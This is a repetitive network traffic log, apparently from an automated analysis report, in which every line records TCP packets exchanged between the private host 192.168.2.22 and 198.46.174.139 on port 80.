Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
